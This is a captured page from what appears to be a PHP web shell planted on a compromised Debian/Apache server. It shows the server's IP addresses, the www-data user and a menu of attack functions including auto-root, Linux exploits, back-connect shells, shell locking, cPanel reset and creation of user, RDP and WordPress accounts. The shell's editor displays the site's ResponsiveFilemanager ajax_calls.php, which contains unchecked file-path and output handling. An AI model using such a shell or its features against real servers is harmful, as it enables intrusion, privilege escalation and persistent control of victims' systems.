Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.55.25
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
lib /
filemanagerOLD /
[ HOME SHELL ]
Name
Size
Permission
Action
ViewerJS
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
jPlayer
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
uploader
[ DIR ]
drwxr-xr-x
ajax_calls.php
16.94
KB
-rw-r--r--
dialog.php
47.1
KB
-rw-r--r--
execute.php
14.15
KB
-rw-r--r--
force_download.php
1016
B
-rw-r--r--
plugin.js
3.08
KB
-rw-r--r--
plugin.min.js
1.9
KB
-rw-r--r--
upload.php
5.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax_calls.php
<?php include 'config/config.php'; if($_SESSION['RF']["verify"] != "RESPONSIVEfilemanager") die('Access Denied!'); include 'include/utils.php'; if (isset($_SESSION['RF']['language_file']) && file_exists($_SESSION['RF']['language_file'])){ include $_SESSION['RF']['language_file']; } else { die('Language file is missing!'); } if(isset($_GET['action'])) { switch($_GET['action']) { case 'view': if(isset($_GET['type'])) { $_SESSION['RF']["view_type"] = $_GET['type']; } else { die('view type number missing'); } break; case 'filter': if(isset($_GET['type'])) { if(isset($remember_text_filter) && $remember_text_filter) $_SESSION['RF']["filter"] = $_GET['type']; } else { die('view type number missing'); } break; case 'sort': if(isset($_GET['sort_by'])) { $_SESSION['RF']["sort_by"] = $_GET['sort_by']; } if(isset($_GET['descending'])) { $_SESSION['RF']["descending"] = $_GET['descending'] === "TRUE"; } break; case 'image_size': // not used $pos = strpos($_POST['path'],$upload_dir); if ($pos !== FALSE) { $info=getimagesize(substr_replace($_POST['path'],$current_path,$pos,strlen($upload_dir))); echo json_encode($info); } break; case 'save_img': $info=pathinfo($_POST['name']); if (strpos($_POST['path'], '/') === 0 || strpos($_POST['path'], '../') !== FALSE || strpos($_POST['path'], './') === 0 || strpos($_POST['url'], 'http://s3.amazonaws.com/feather') !== 0 || $_POST['name'] != fix_filename($_POST['name'], $transliteration,$convert_spaces,$replace_with) || !in_array(strtolower($info['extension']), array('jpg','jpeg','png'))) { die('wrong data'); } $image_data = file_get_contents($_POST['url']); if ($image_data === FALSE) { die(lang_Aviary_No_Save); } $fp = fopen($current_path.$_POST['path'].$_POST['name'], "w"); fwrite($fp, $image_data); fclose($fp); create_img($current_path.$_POST['path'].$_POST['name'], $thumbs_base_path.$_POST['path'].$_POST['name'], 122, 91); // TODO something with this function cause its blowing my mind new_thumbnails_creation($current_path.$_POST['path'],$current_path.$_POST['path'].$_POST['name'],$_POST['name'],$current_path,$relative_image_creation,$relative_path_from_current_pos,$relative_image_creation_name_to_prepend,$relative_image_creation_name_to_append,$relative_image_creation_width,$relative_image_creation_height,$relative_image_creation_option,$fixed_image_creation,$fixed_path_from_filemanager,$fixed_image_creation_name_to_prepend,$fixed_image_creation_to_append,$fixed_image_creation_width,$fixed_image_creation_height,$fixed_image_creation_option); break; case 'extract': if(strpos($_POST['path'],'/')===0 || strpos($_POST['path'],'../')!==FALSE || strpos($_POST['path'],'./')===0) { die('wrong path'); } $path = $current_path.$_POST['path']; $info = pathinfo($path); $base_folder = $current_path.fix_dirname($_POST['path'])."/"; switch($info['extension']) { case "zip": $zip = new ZipArchive; if ($zip->open($path) === TRUE) { //make all the folders for($i = 0; $i < $zip->numFiles; $i++) { $OnlyFileName = $zip->getNameIndex($i); $FullFileName = $zip->statIndex($i); if (substr($FullFileName['name'], -1, 1) =="/") { create_folder($base_folder.$FullFileName['name']); } } //unzip into the folders for($i = 0; $i < $zip->numFiles; $i++) { $OnlyFileName = $zip->getNameIndex($i); $FullFileName = $zip->statIndex($i); if (!(substr($FullFileName['name'], -1, 1) =="/")) { $fileinfo = pathinfo($OnlyFileName); if(in_array(strtolower($fileinfo['extension']),$ext)) { copy('zip://'. $path .'#'. $OnlyFileName , $base_folder.$FullFileName['name'] ); } } } $zip->close(); } else { die(lang_Zip_No_Extract); } break; case "gz": $p = new PharData($path); $p->decompress(); // creates files.tar break; case "tar": // unarchive from the tar $phar = new PharData($path); $phar->decompressFiles(); $files = array(); check_files_extensions_on_phar( $phar, $files, '', $ext ); $phar->extractTo( $current_path.fix_dirname( $_POST['path'] )."/", $files, TRUE ); break; default: die(lang_Zip_Invalid); } break; case 'media_preview': $preview_file = $_GET["file"]; $info = pathinfo($preview_file); ?> <div id="jp_container_1" class="jp-video " style="margin:0 auto;"> <div class="jp-type-single"> <div id="jquery_jplayer_1" class="jp-jplayer"></div> <div class="jp-gui"> <div class="jp-video-play"> <a href="javascript:;" class="jp-video-play-icon" tabindex="1">play</a> </div> <div class="jp-interface"> <div class="jp-progress"> <div class="jp-seek-bar"> <div class="jp-play-bar"></div> </div> </div> <div class="jp-current-time"></div> <div class="jp-duration"></div> <div class="jp-controls-holder"> <ul class="jp-controls"> <li><a href="javascript:;" class="jp-play" tabindex="1">play</a></li> <li><a href="javascript:;" class="jp-pause" tabindex="1">pause</a></li> <li><a href="javascript:;" class="jp-stop" tabindex="1">stop</a></li> <li><a href="javascript:;" class="jp-mute" tabindex="1" title="mute">mute</a></li> <li><a href="javascript:;" class="jp-unmute" tabindex="1" title="unmute">unmute</a></li> <li><a href="javascript:;" class="jp-volume-max" tabindex="1" title="max volume">max volume</a></li> </ul> <div class="jp-volume-bar"> <div class="jp-volume-bar-value"></div> </div> <ul class="jp-toggles"> <li><a href="javascript:;" class="jp-full-screen" tabindex="1" title="full screen">full screen</a></li> <li><a href="javascript:;" class="jp-restore-screen" tabindex="1" title="restore screen">restore screen</a></li> <li><a href="javascript:;" class="jp-repeat" tabindex="1" title="repeat">repeat</a></li> <li><a href="javascript:;" class="jp-repeat-off" tabindex="1" title="repeat off">repeat off</a></li> </ul> </div> <div class="jp-title" style="display:none;"> <ul> <li></li> </ul> </div> </div> </div> <div class="jp-no-solution"> <span>Update Required</span> To play the media you will need to either update your browser to a recent version or update your <a href="http://get.adobe.com/flashplayer/" target="_blank">Flash plugin</a>. </div> </div> </div> <?php if(in_array(strtolower($info['extension']), $ext_music)) { ?> <script type="text/javascript"> $(document).ready(function(){ $("#jquery_jplayer_1").jPlayer({ ready: function () { $(this).jPlayer("setMedia", { title:"<?php $_GET['title']; ?>", mp3: "<?php echo $preview_file; ?>", m4a: "<?php echo $preview_file; ?>", oga: "<?php echo $preview_file; ?>", wav: "<?php echo $preview_file; ?>" }); }, swfPath: "js", solution:"html,flash", supplied: "mp3, m4a, midi, mid, oga,webma, ogg, wav", smoothPlayBar: true, keyEnabled: false }); }); </script> <?php } elseif(in_array(strtolower($info['extension']), $ext_video)) { ?> <script type="text/javascript"> $(document).ready(function(){ $("#jquery_jplayer_1").jPlayer({ ready: function () { $(this).jPlayer("setMedia", { title:"<?php $_GET['title']; ?>", m4v: "<?php echo $preview_file; ?>", ogv: "<?php echo $preview_file; ?>" }); }, swfPath: "js", solution:"html,flash", supplied: "mp4, m4v, ogv, flv, webmv, webm", smoothPlayBar: true, keyEnabled: false }); }); </script> <?php } break; case 'copy_cut': if ($_POST['sub_action'] != 'copy' && $_POST['sub_action'] != 'cut') { die('wrong sub-action'); } if (trim($_POST['path']) == '' || trim($_POST['path_thumb']) == '') { die('no path'); } $path = $current_path.$_POST['path']; if (is_dir($path)) { // can't copy/cut dirs if ($copy_cut_dirs === FALSE){ die(sprintf(lang_Copy_Cut_Not_Allowed, ($_POST['sub_action'] == 'copy' ? lcfirst(lang_Copy) : lcfirst(lang_Cut)), lang_Folders)); } // size over limit if ($copy_cut_max_size !== FALSE && is_int($copy_cut_max_size)){ if (($copy_cut_max_size * 1024 * 1024) < foldersize($path)){ die(sprintf(lang_Copy_Cut_Size_Limit, ($_POST['sub_action'] == 'copy' ? lcfirst(lang_Copy) : lcfirst(lang_Cut)), $copy_cut_max_size)); } } // file count over limit if ($copy_cut_max_count !== FALSE && is_int($copy_cut_max_count)){ if ($copy_cut_max_count < filescount($path)){ die(sprintf(lang_Copy_Cut_Count_Limit, ($_POST['sub_action'] == 'copy' ? lcfirst(lang_Copy) : lcfirst(lang_Cut)), $copy_cut_max_count)); } } } else { // can't copy/cut files if ($copy_cut_files === FALSE){ die(sprintf(lang_Copy_Cut_Not_Allowed, ($_POST['sub_action'] == 'copy' ? lcfirst(lang_Copy) : lcfirst(lang_Cut)), lang_Files)); } } $_SESSION['RF']['clipboard']['path'] = $_POST['path']; $_SESSION['RF']['clipboard']['path_thumb'] = $_POST['path_thumb']; $_SESSION['RF']['clipboard_action'] = $_POST['sub_action']; break; case 'clear_clipboard': $_SESSION['RF']['clipboard'] = NULL; $_SESSION['RF']['clipboard_action'] = NULL; break; case 'chmod': $path = $current_path.$_POST['path']; if ( (is_dir($path) && $chmod_dirs === FALSE) || (is_file($path) && $chmod_files === FALSE) || (is_function_callable("chmod") === FALSE) ) { die(sprintf(lang_File_Permission_Not_Allowed, (is_dir($path) ? lcfirst(lang_Folders) : lcfirst(lang_Files)))); } else { $perm = decoct(fileperms($path) & 0777); $perm_user = substr($perm, 0, 1); $perm_group = substr($perm, 1, 1); $perm_all = substr($perm, 2, 1); $ret = '<div id="files_permission_start"> <form id="chmod_form"> <table class="file-perms-table"> <thead> <tr> <td></td> <td>r </td> <td>w </td> <td>x </td> </tr> </thead> <tbody> <tr> <td>'.lang_User.'</td> <td><input id="u_4" type="checkbox" data-value="4" data-group="user" onChange="chmod_logic();"'.(chmod_logic_helper($perm_user, 4) ? " checked" : "").'></td> <td><input id="u_2" type="checkbox" data-value="2" data-group="user" onChange="chmod_logic();"'.(chmod_logic_helper($perm_user, 2) ? " checked" : "").'></td> <td><input id="u_1" type="checkbox" data-value="1" data-group="user" onChange="chmod_logic();"'.(chmod_logic_helper($perm_user, 1) ? " checked" : "").'></td> </tr> <tr> <td>'.lang_Group.'</td> <td><input id="g_4" type="checkbox" data-value="4" data-group="group" onChange="chmod_logic();"'.(chmod_logic_helper($perm_group, 4) ? " checked" : "").'></td> <td><input id="g_2" type="checkbox" data-value="2" data-group="group" onChange="chmod_logic();"'.(chmod_logic_helper($perm_group, 2) ? " checked" : "").'></td> <td><input id="g_1" type="checkbox" data-value="1" data-group="group" onChange="chmod_logic();"'.(chmod_logic_helper($perm_group, 1) ? " checked" : "").'></td> </tr> <tr> <td>'.lang_All.'</td> <td><input id="a_4" type="checkbox" data-value="4" data-group="all" onChange="chmod_logic();"'.(chmod_logic_helper($perm_all, 4) ? " checked" : "").'></td> <td><input id="a_2" type="checkbox" data-value="2" data-group="all" onChange="chmod_logic();"'.(chmod_logic_helper($perm_all, 2) ? " checked" : "").'></td> <td><input id="a_1" type="checkbox" data-value="1" data-group="all" onChange="chmod_logic();"'.(chmod_logic_helper($perm_all, 1) ? " checked" : "").'></td> </tr> <tr> <td></td> <td colspan="3"><input type="text" name="chmod_value" id="chmod_value" value="'.$perm.'" data-def-value="'.$perm.'"></td> </tr> </tbody> </table>'; if (is_dir($path)){ $ret .= '<div>'.lang_File_Permission_Recursive.' <ul> <li><input value="none" name="apply_recursive" type="radio" checked> '.lang_No.'</li> <li><input value="files" name="apply_recursive" type="radio"> '.lang_Files.'</li> <li><input value="folders" name="apply_recursive" type="radio"> '.lang_Folders.'</li> <li><input value="both" name="apply_recursive" type="radio"> '.lang_Files.' & '.lang_Folders.'</li> </ul> </div>'; } $ret .= '</form></div>'; echo $ret; } break; case 'get_lang': if (!file_exists('lang/languages.php')){ die(lang_Lang_Not_Found); } require_once 'lang/languages.php'; if (!isset($languages) || !is_array($languages)){ die(lang_Lang_Not_Found); } $curr = $_SESSION['RF']['language']; $ret = '<select id="new_lang_select">'; foreach ($languages as $code => $name) { $ret .= '<option value="'.$code.'"'.($code == $curr ? ' selected' : '').'>'.$name.'</option>'; } $ret .= '</select>'; echo $ret; break; case 'change_lang': $choosen_lang = $_POST['choosen_lang']; if (!file_exists('lang/'.$choosen_lang.'.php')) { die(lang_Lang_Not_Found); } $_SESSION['RF']['language'] = $choosen_lang; $_SESSION['RF']['language_file'] = 'lang/'.$choosen_lang.'.php'; break; case 'get_file': // preview or edit $sub_action = $_GET['sub_action']; $preview_mode = $_GET["preview_mode"]; if ($sub_action != 'preview' && $sub_action != 'edit'){ die("wrong action"); } $selected_file = ($sub_action == 'preview' ? $_GET['file'] : $current_path.$_POST['path']); $info = pathinfo($selected_file); if (!file_exists($selected_file)) { die(lang_File_Not_Found); } if ($preview_mode == 'text') { $is_allowed = ($sub_action == 'preview' ? $preview_text_files : $edit_text_files); $allowed_file_exts = ($sub_action == 'preview' ? $previewable_text_file_exts : $editable_text_file_exts); } elseif($preview_mode == 'viewerjs') { $is_allowed = $viewerjs_enabled; $allowed_file_exts = $viewerjs_file_exts; } elseif($preview_mode == 'google') { $is_allowed = $googledoc_enabled; $allowed_file_exts = $googledoc_file_exts; } if (!isset($allowed_file_exts) || !is_array($allowed_file_exts)){ $allowed_file_exts = array(); } if (!in_array($info['extension'], $allowed_file_exts) || !isset($is_allowed) || $is_allowed === FALSE || !is_readable($selected_file)) { die(sprintf(lang_File_Open_Edit_Not_Allowed, ($sub_action == 'preview' ? strtolower(lang_Open) : strtolower(lang_Edit)))); } if ($sub_action == 'preview') { if ($preview_mode == 'text') { // get and sanities $data = stripslashes(htmlspecialchars(file_get_contents($selected_file))); if(!in_array($info['extension'],$previewable_text_file_exts_no_prettify)){ echo '<script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js?lang='.$info['extension'].'&skin=sunburst"></script>'; echo '<div class="text-center"><strong>'.$info['basename'].'</strong></div><pre class="prettyprint">'.$data.'</pre>'; } else{ echo '<div class="text-center"><strong>'.$info['basename'].'</strong></div><pre class="no-prettify">'.$data.'</pre>'; } } elseif ($preview_mode == 'viewerjs') { echo '<iframe id="viewer" src="ViewerJS/#../'.$_GET["file"].'" allowfullscreen="" webkitallowfullscreen="" class="viewer-iframe"></iframe>'; } elseif ($preview_mode == 'google') { $url_file=$base_url.$upload_dir.str_replace($current_path,'',$_GET["file"]); $googledoc_url = urlencode($url_file); $googledoc_html = "<iframe src=\"http://docs.google.com/viewer?url=".$googledoc_url."&embedded=true\" class=\"google-iframe\"></iframe>"; echo '<div class="text-center"><strong>'.$info['basename'].'</strong></div>'.$googledoc_html.''; } } else { $data = stripslashes(htmlspecialchars(file_get_contents($selected_file))); echo '<textarea id="textfile_edit_area" style="width:100%;height:300px;">'.$data.'</textarea>'; } break; default: die('no action passed'); } } else { die('no action passed'); } ?>
Close
